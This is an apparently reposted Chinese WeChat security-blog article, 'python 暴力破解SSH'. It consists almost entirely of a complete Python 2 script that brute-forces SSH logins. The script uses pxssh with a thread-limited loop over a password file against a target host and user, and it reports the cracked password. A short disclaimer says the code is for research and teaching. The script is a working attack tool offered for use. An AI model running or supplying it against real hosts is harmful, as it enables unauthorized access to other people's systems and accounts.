import pxssh import optparse import time from threading import * #最大线程数量控制数 maxConnections=5 connection_lock=BoundedSemaphore(value=maxConnections) #Found 为密码成功破解后退出程序的信号 Found=False #Fails SSH连接数超过限制后会触发异常,触发异常后重新尝试 Fails=0 def connect(host,user,password,release): global Found global Fails global threadExit try: s=pxssh.pxssh() s.login(host,user,password) print '[+] Password Found: '+password Found=True except Exception,e: if 'read_nonblocking' in str(e): Fails+=1 if Fails>4: print "[!] Exiting:Too Many Socket Timeout" time.sleep(1) connect(host,user,password,False) elif 'synchronize with original prompt' in str(e): print "time sleep(1)" time.sleep(1) connect(host,user,password,False) finally: #线程代码执行后释放锁 if release: connection_lock.release() def main(): parser=optparse.OptionParser('usage %prog '+ '-H-u-F') parser.add_option('-H',dest='tgtHost',type='string', help='specify target host') parser.add_option('-F',dest='passwdFile',type='string', help='specify password file') parser.add_option('-u',dest='user',type='string', help='specify the user') (options,args)=parser.parse_args() tgtHost=options.tgtHost user=options.user passwdFile=options.passwdFile print tgtHost print user print passwdFile host=options.tgtHost passwdFile=options.passwdFile user=options.user if host ==None or passwdFile ==None or user ==None: print parser.usage exit(0) fn=open(passwdFile,'r') for line in fn.readlines(): password=line.strip('r').strip('n') #代码开始执行时,添加锁 connection_lock.acquire() print "[-]Testing : "+str(password) t=Thread(target=connect,args=(host,user, password,True)) child=t.start() if Found: print "[*] Exiting:Password Found" exit(0) if __name__=='__main__': main()
本文始发于微信公众号(飓风网络安全):python 暴力破解SSH
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论